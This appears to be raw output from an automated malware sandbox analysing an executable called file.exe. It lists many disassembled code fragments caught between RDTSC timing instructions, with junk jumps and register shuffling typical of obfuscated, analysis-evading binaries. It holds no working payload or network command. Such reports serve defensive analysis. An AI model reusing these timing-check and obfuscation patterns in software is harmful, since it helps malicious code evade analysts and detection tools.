              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8067A second address: 4E806FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b movzx esi, di 0x0000000e pushfd 0x0000000f jmp 00007FC714E8FEF9h 0x00000014 adc cx, 5916h 0x00000019 jmp 00007FC714E8FEF1h 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007FC714E8FEF1h 0x00000026 nop 0x00000027 jmp 00007FC714E8FEEEh 0x0000002c push dword ptr [ebp+08h] 0x0000002f pushad 0x00000030 mov bl, ch 0x00000032 push eax 0x00000033 push edx 0x00000034 movsx edi, cx 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8078B second address: 4E807C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC714E9842Eh 0x00000009 sub si, F918h 0x0000000e jmp 00007FC714E9842Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, esi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push esi 0x0000001d pop edx 0x0000001e jmp 00007FC714E9842Ah 0x00000023 popad 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E807C3 second address: 4E807C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E807C8 second address: 4E807FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, dx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b jmp 00007FC714E98439h 0x00000010 leave 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC714E9842Dh 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E807FC second address: 4E70039 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d cmp eax, 00000000h 0x00000010 setne al 0x00000013 xor ebx, ebx 0x00000015 test al, 01h 0x00000017 jne 00007FC714E8FEE7h 0x00000019 xor eax, eax 0x0000001b sub esp, 08h 0x0000001e mov dword ptr [esp], 00000000h 0x00000025 mov dword ptr [esp+04h], 00000000h 0x0000002d call 00007FC719839323h 0x00000032 mov edi, edi 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 mov cl, 11h 0x00000039 pushfd 0x0000003a jmp 00007FC714E8FEF9h 0x0000003f sbb ax, 6A76h 0x00000044 jmp 00007FC714E8FEF1h 0x00000049 popfd 0x0000004a popad 0x0000004b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70039 second address: 4E70049 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC714E9842Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70049 second address: 4E7004D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7004D second address: 4E7006B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC714E98433h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7006B second address: 4E70071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70071 second address: 4E70075 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70075 second address: 4E700BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c mov cx, 332Fh 0x00000010 popad 0x00000011 mov ebp, esp 0x00000013 jmp 00007FC714E8FEF2h 0x00000018 push FFFFFFFEh 0x0000001a jmp 00007FC714E8FEF0h 0x0000001f call 00007FC714E8FEE9h 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 mov bh, FBh 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E700BA second address: 4E70138 instructions: 0x00000000 rdtsc 0x00000002 mov dl, ch 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007FC714E9842Ch 0x0000000f add si, 15E8h 0x00000014 jmp 00007FC714E9842Bh 0x00000019 popfd 0x0000001a mov ebx, esi 0x0000001c popad 0x0000001d mov eax, dword ptr [esp+04h] 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007FC714E9842Bh 0x00000028 or eax, 3F5AE52Eh 0x0000002e jmp 00007FC714E98439h 0x00000033 popfd 0x00000034 push eax 0x00000035 push edx 0x00000036 pushfd 0x00000037 jmp 00007FC714E9842Eh 0x0000003c or ecx, 4A87EAA8h 0x00000042 jmp 00007FC714E9842Bh 0x00000047 popfd 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70138 second address: 4E7016C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 jmp 00007FC714E8FEF4h 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007FC714E8FEECh 0x00000018 mov ecx, 1ED01011h 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7016C second address: 4E701F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 36h 0x00000005 mov al, 08h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c mov eax, edi 0x0000000e push ebx 0x0000000f movzx eax, dx 0x00000012 pop ebx 0x00000013 popad 0x00000014 push 2B56407Fh 0x00000019 jmp 00007FC714E98437h 0x0000001e add dword ptr [esp], 4A52EAF1h 0x00000025 jmp 00007FC714E98436h 0x0000002a mov eax, dword ptr fs:[00000000h] 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007FC714E98439h 0x00000039 adc ecx, 0C3D1446h 0x0000003f jmp 00007FC714E98431h 0x00000044 popfd 0x00000045 popad 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E701F5 second address: 4E70271 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b push eax 0x0000000c pushfd 0x0000000d jmp 00007FC714E8FEF3h 0x00000012 or eax, 72A5902Eh 0x00000018 jmp 00007FC714E8FEF9h 0x0000001d popfd 0x0000001e pop eax 0x0000001f mov bh, D2h 0x00000021 popad 0x00000022 push eax 0x00000023 jmp 00007FC714E8FEF3h 0x00000028 nop 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FC714E8FEF5h 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70271 second address: 4E70277 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70277 second address: 4E70318 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 18h 0x0000000b jmp 00007FC714E8FEEFh 0x00000010 xchg eax, ebx 0x00000011 jmp 00007FC714E8FEF6h 0x00000016 push eax 0x00000017 pushad 0x00000018 mov cx, dx 0x0000001b mov dl, 0Fh 0x0000001d popad 0x0000001e xchg eax, ebx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FC714E8FEF2h 0x00000026 add si, 4FF8h 0x0000002b jmp 00007FC714E8FEEBh 0x00000030 popfd 0x00000031 mov edi, ecx 0x00000033 popad 0x00000034 xchg eax, esi 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007FC714E8FEF7h 0x0000003e sub ecx, 7C29706Eh 0x00000044 jmp 00007FC714E8FEF9h 0x00000049 popfd 0x0000004a push ecx 0x0000004b pop edi 0x0000004c popad 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70435 second address: 4E7043B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7043B second address: 4E70460 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FC714E8FEF3h 0x0000000e nop 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov ecx, edx 0x00000014 push edx 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70460 second address: 4E70540 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC714E98436h 0x00000009 or esi, 77B463A8h 0x0000000f jmp 00007FC714E9842Bh 0x00000014 popfd 0x00000015 jmp 00007FC714E98438h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d lea eax, dword ptr [ebp-10h] 0x00000020 pushad 0x00000021 mov eax, 4579D6DDh 0x00000026 pushad 0x00000027 movzx esi, di 0x0000002a pushfd 0x0000002b jmp 00007FC714E98435h 0x00000030 or eax, 6CF18926h 0x00000036 jmp 00007FC714E98431h 0x0000003b popfd 0x0000003c popad 0x0000003d popad 0x0000003e mov dword ptr fs:[00000000h], eax 0x00000044 jmp 00007FC714E9842Eh 0x00000049 mov dword ptr [ebp-18h], esp 0x0000004c jmp 00007FC714E98430h 0x00000051 mov eax, dword ptr fs:[00000018h] 0x00000057 pushad 0x00000058 call 00007FC714E9842Eh 0x0000005d pop edx 0x0000005e mov cl, 39h 0x00000060 popad 0x00000061 mov ecx, dword ptr [eax+00000FDCh] 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007FC714E98434h 0x0000006e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70540 second address: 4E70546 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70546 second address: 4E7054A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7054A second address: 4E705A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ecx, ecx 0x0000000a jmp 00007FC714E8FEF9h 0x0000000f jns 00007FC714E8FEFFh 0x00000015 jmp 00007FC714E8FEEEh 0x0000001a add eax, ecx 0x0000001c pushad 0x0000001d mov al, 5Dh 0x0000001f mov ebx, 1BCD912Eh 0x00000024 popad 0x00000025 mov ecx, dword ptr [ebp+08h] 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FC714E8FEF0h 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E705A1 second address: 4E705A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E603A1 second address: 4E603D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FC714E8FEF6h 0x0000000f push eax 0x00000010 jmp 00007FC714E8FEEBh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 mov bh, ch 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E603D9 second address: 4E6045D instructions: 0x00000000 rdtsc 0x00000002 mov dx, EA02h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushfd 0x00000009 jmp 00007FC714E98433h 0x0000000e sub ch, FFFFFFFEh 0x00000011 jmp 00007FC714E98439h 0x00000016 popfd 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a jmp 00007FC714E9842Eh 0x0000001f sub esp, 2Ch 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 push edi 0x00000026 pop eax 0x00000027 pushfd 0x00000028 jmp 00007FC714E98439h 0x0000002d or ax, E096h 0x00000032 jmp 00007FC714E98431h 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6045D second address: 4E60463 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60463 second address: 4E6049D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E98433h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FC714E98436h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 movzx eax, di 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6049D second address: 4E604D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, cx 0x00000006 mov ecx, 402D2A1Dh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebx 0x0000000f jmp 00007FC714E8FEF8h 0x00000014 xchg eax, edi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC714E8FEEAh 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E604D3 second address: 4E604D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E604D7 second address: 4E604DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E604DD second address: 4E604EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC714E9842Dh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E604EE second address: 4E604F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E604F2 second address: 4E6056D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FC714E9842Ah 0x00000010 adc eax, 0BEBDA38h 0x00000016 jmp 00007FC714E9842Bh 0x0000001b popfd 0x0000001c call 00007FC714E98438h 0x00000021 call 00007FC714E98432h 0x00000026 pop esi 0x00000027 pop ebx 0x00000028 popad 0x00000029 xchg eax, edi 0x0000002a pushad 0x0000002b pushad 0x0000002c jmp 00007FC714E9842Ah 0x00000031 call 00007FC714E98432h 0x00000036 pop eax 0x00000037 popad 0x00000038 push eax 0x00000039 push edx 0x0000003a mov di, ECD4h 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6058F second address: 4E605A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E605A4 second address: 4E605B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC714E9842Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E605B4 second address: 4E605B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E605B8 second address: 4E605CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E605CB second address: 4E605CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E605CF second address: 4E605D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E605D3 second address: 4E605D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E605D9 second address: 4E60619 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC714E9842Eh 0x00000009 or cx, BD48h 0x0000000e jmp 00007FC714E9842Bh 0x00000013 popfd 0x00000014 mov bh, ah 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov edi, 00000000h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 jmp 00007FC714E9842Dh 0x00000026 push esi 0x00000027 pop edx 0x00000028 popad 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60619 second address: 4E6067E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 75F8783Eh 0x00000008 pushfd 0x00000009 jmp 00007FC714E8FEEFh 0x0000000e or ecx, 04516CEEh 0x00000014 jmp 00007FC714E8FEF9h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d inc ebx 0x0000001e jmp 00007FC714E8FEEEh 0x00000023 test al, al 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FC714E8FEF7h 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6067E second address: 4E60684 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60684 second address: 4E60688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60688 second address: 4E6069C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FC714E98666h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6069C second address: 4E606A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E606A2 second address: 4E60712 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, D5A4h 0x00000007 call 00007FC714E9842Dh 0x0000000c pop eax 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 lea ecx, dword ptr [ebp-14h] 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FC714E9842Dh 0x0000001a jmp 00007FC714E9842Bh 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007FC714E98438h 0x00000026 and ecx, 2CCCF6B8h 0x0000002c jmp 00007FC714E9842Bh 0x00000031 popfd 0x00000032 popad 0x00000033 mov dword ptr [ebp-14h], edi 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 mov dh, 4Ah 0x0000003b mov eax, 1A6D1083h 0x00000040 popad 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6073E second address: 4E60744 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60744 second address: 4E6074A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6074A second address: 4E6074E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6074E second address: 4E6078C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007FC714E98434h 0x0000000e push eax 0x0000000f jmp 00007FC714E9842Bh 0x00000014 nop 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC714E98430h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6078C second address: 4E60790 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60790 second address: 4E60796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60796 second address: 4E607C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call dword ptr [75AF86D4h] 0x0000000f mov edi, edi 0x00000011 push ebp 0x00000012 mov ebp, esp 0x00000014 push FFFFFFFEh 0x00000016 push 76F8CA08h 0x0000001b push 76EFAE00h 0x00000020 mov eax, dword ptr fs:[00000000h] 0x00000026 push eax 0x00000027 sub esp, 0Ch 0x0000002a push ebx 0x0000002b push esi 0x0000002c push edi 0x0000002d mov eax, dword ptr [76FAB370h] 0x00000032 xor dword ptr [ebp-08h], eax 0x00000035 xor eax, ebp 0x00000037 push eax 0x00000038 lea eax, dword ptr [ebp-10h] 0x0000003b mov dword ptr fs:[00000000h], eax 0x00000041 mov dword ptr [ebp-18h], esp 0x00000044 mov eax, dword ptr fs:[00000018h] 0x0000004a test eax, eax 0x0000004c je 00007FC714ED3531h 0x00000052 mov dword ptr [ebp-04h], 00000000h 0x00000059 mov edx, dword ptr [ebp+08h] 0x0000005c mov dword ptr [eax+00000BF4h], edx 0x00000062 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000069 test edx, edx 0x0000006b je 00007FC714E8FF89h 0x00000071 xor edx, edx 0x00000073 jmp 00007FC714E8FEC8h 0x00000075 mov eax, edx 0x00000077 mov ecx, dword ptr [ebp-10h] 0x0000007a mov dword ptr fs:[00000000h], ecx 0x00000081 pop ecx 0x00000082 pop edi 0x00000083 pop esi 0x00000084 pop ebx 0x00000085 mov esp, ebp 0x00000087 pop ebp 0x00000088 retn 0004h 0x0000008b push eax 0x0000008c push edx 0x0000008d jmp 00007FC714E8FEF7h 0x00000092 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E607C7 second address: 4E607CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E607CD second address: 4E60862 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d pushad 0x0000000e call 00007FC714E8FEF4h 0x00000013 mov edx, esi 0x00000015 pop ecx 0x00000016 pushfd 0x00000017 jmp 00007FC714E8FEF7h 0x0000001c sub ecx, 1D886D6Eh 0x00000022 jmp 00007FC714E8FEF9h 0x00000027 popfd 0x00000028 popad 0x00000029 jg 00007FC785ACDB41h 0x0000002f pushad 0x00000030 mov ecx, 002E3B93h 0x00000035 mov di, ax 0x00000038 popad 0x00000039 js 00007FC714E8FF75h 0x0000003f jmp 00007FC714E8FEF2h 0x00000044 cmp dword ptr [ebp-14h], edi 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60862 second address: 4E6087F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E98439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6087F second address: 4E60885 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60885 second address: 4E60889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60889 second address: 4E6088D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60993 second address: 4E609AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC714E98438h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E609AF second address: 4E609ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC714E8FEF9h 0x00000012 or ch, FFFFFFC6h 0x00000015 jmp 00007FC714E8FEF1h 0x0000001a popfd 0x0000001b push esi 0x0000001c pop edx 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E609ED second address: 4E60A10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E9842Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC714E9842Dh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60010 second address: 4E60016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
